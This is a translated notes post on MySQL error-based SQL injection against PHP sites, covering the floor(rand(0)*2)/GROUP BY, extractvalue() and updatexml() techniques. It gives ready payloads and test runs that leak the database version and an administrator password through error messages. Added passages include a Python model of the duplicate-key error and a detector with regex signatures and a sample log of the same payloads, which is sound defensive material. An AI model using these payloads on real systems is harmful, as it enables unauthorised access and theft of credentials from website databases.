Posting some of my old notes. When MySQL executes a statement it returns an error message, and PHP+MySQL sites often display that error text on the page, so the three techniques below can be used to pull specific data out of the error.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Triggering an error with floor()
The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First, a normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
The MySQL version is leaked in the error message. To retrieve other data, replace the version() expression with the subquery you need.
For example, to retrieve the administrator's username and password:
Method1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
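Why this produces a duplicate-key error, and why Method2 needs a three-row derived table, as an added illustration that is not part of the original notes: a toy Python model of the temporary table MySQL builds for GROUP BY. MySQL evaluates the grouping expression once to look the group up and, when the group is new, again while writing the row, so a nondeterministic key can be stored under a value that was never looked up. The floor(rand(0)*2) values used here are the fixed first ten values MySQL produces for seed 0; the two-evaluation behaviour is modelled, not MySQL's real code.

```python
from typing import Dict, Iterator


class DuplicateEntry(Exception):
    """Stands in for MySQL ERROR 1062 (23000): Duplicate entry ... for key 'group_key'."""


def floor_rand0_times_2() -> Iterator[int]:
    """First ten values of floor(rand(0)*2).

    rand(0) is seeded, so MySQL always yields the same sequence
    (0.155, 0.621, 0.639, 0.331, ...), i.e. 0 1 1 0 1 1 0 0 1 1 after floor(*2).
    """
    yield from (0, 1, 1, 0, 1, 1, 0, 0, 1, 1)


def group_by_count(prefix: str, n_rows: int, keys: Iterator[int]) -> Dict[str, int]:
    """Toy model of `select count(*), concat(prefix, floor(rand(0)*2)) x ... group by x`
    over a source table with n_rows rows (the model is an assumption, not MySQL's code)."""
    groups: Dict[str, int] = {}
    for _ in range(n_rows):
        lookup_key = prefix + str(next(keys))     # evaluation 1: which group does this row belong to?
        if lookup_key in groups:
            groups[lookup_key] += 1
            continue
        insert_key = prefix + str(next(keys))     # evaluation 2: the key actually written to the new row
        if insert_key in groups:                  # never looked up, yet already present -> collision
            raise DuplicateEntry(f"Duplicate entry '{insert_key}' for key 'group_key'")
        groups[insert_key] = 1
    return groups


def collides(prefix: str, n_rows: int) -> bool:
    """True if the toy GROUP BY over n_rows rows raises the duplicate-key error."""
    try:
        group_by_count(prefix, n_rows, floor_rand0_times_2())
    except DuplicateEntry:
        return True
    return False


def rows_needed_for_error(prefix: str = "v", max_rows: int = 5) -> int:
    """Smallest source-table row count at which the collision occurs (0 if none up to max_rows)."""
    for n in range(1, max_rows + 1):
        if collides(prefix, n):
            return n
    return 0


if __name__ == "__main__":
    # Two rows: keys 0/1 then 1 -> one group "…1" with count 2, no error.
    print(group_by_count("5.1.33-community-log", 2, floor_rand0_times_2()))
    # Three rows: row 3 looks up "…0", is absent, is written as "…1" -> collision.
    try:
        group_by_count("5.1.33-community-log", 3, floor_rand0_times_2())
    except DuplicateEntry as e:
        print("ERROR 1062 (23000):", e)
    print("rows needed:", rows_needed_for_error())
```

The model also explains the trailing "1" in the leaked values ('5.1.33-community-log1', 'admin8881'): the colliding row is always written with the second-evaluation key, which is 1 in this sequence. A source with fewer than three rows never collides, which is why the second payload unions three rows together rather than relying on a table of unknown size.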
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
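A defender's view of the three techniques above, as an added example that is not from the original notes: a small Python detector that flags the signatures of the floor()/GROUP BY trick, extractvalue() and updatexml() in URL-decoded request query strings, and separately flags the MySQL error text these techniques rely on (the notes' own "Duplicate entry ... for key 'group_key'" and "XPATH syntax error" messages) when it shows up in a response body. The access-log layout, client IP and timestamps are constructed for the example; the injected values are the payloads from the notes, URL-encoded.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus, urlsplit

# Request-side signatures, applied to the URL-decoded, lower-cased query string.
# The floor() technique needs BOTH parts, in either order: Method1 puts GROUP BY
# after floor(), Method2 puts it before.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)")
GROUP_BY = re.compile(r"group\s+by")
XML_FUNCS = {
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
}

# Response-side signatures: the error text that must reach the client for these to work.
RESPONSE_LEAKS = {
    "mysql_duplicate_entry": re.compile(r"Duplicate entry '[^']*' for key 'group_key'"),
    "mysql_xpath_error": re.compile(r"XPATH syntax error: '[^']*'"),
}

# Request line of an Apache/nginx "combined"-style log: method, target, status (assumed layout).
REQ_LINE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample log; the injected values are the notes' payloads, URL-encoded.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /article.php?id=1%20and%20(select%201%20from%20'
    '(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 500 220',
    '203.0.113.5 - - [10/Oct/2023:13:55:47 +0000] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,'
    '(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 190',
    '203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /article.php?id=1%20and%201=(updatexml(1,concat(0x5e24,'
    '(select%20user()),0x5e24),1)) HTTP/1.1" 500 190',
]


def decode_query(raw: str) -> str:
    """URL-decode twice so a single layer of double-encoding does not hide keywords, then lower-case."""
    return unquote_plus(unquote_plus(raw)).lower()


def classify_request(raw_query: str) -> List[str]:
    """Names of the error-based techniques whose signature appears in the query string."""
    q = decode_query(raw_query)
    hits: List[str] = []
    if FLOOR_RAND.search(q) and GROUP_BY.search(q):
        hits.append("floor_rand_groupby")
    hits.extend(name for name, pat in XML_FUNCS.items() if pat.search(q))
    return hits


def classify_response(body: str) -> List[str]:
    """Names of MySQL error leaks present in a response body."""
    return [name for name, pat in RESPONSE_LEAKS.items() if pat.search(body)]


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """One finding per log line whose query string matches a technique signature."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = REQ_LINE.search(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m.group("target")).query
        hits = classify_request(query)
        if hits:
            findings.append({"status": int(m.group("status")), "techniques": hits})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f)
    print(classify_response("ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"))
```

The response-side check is the one worth alerting on even when the request was not caught: all three techniques depend on the database error text reaching the browser. A PHP application that logs MySQL errors server-side instead of echoing them, and binds the id parameter with a prepared statement rather than concatenating it into the query, removes both the channel and the injection point.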
That's all. Thanks to the foreign guys.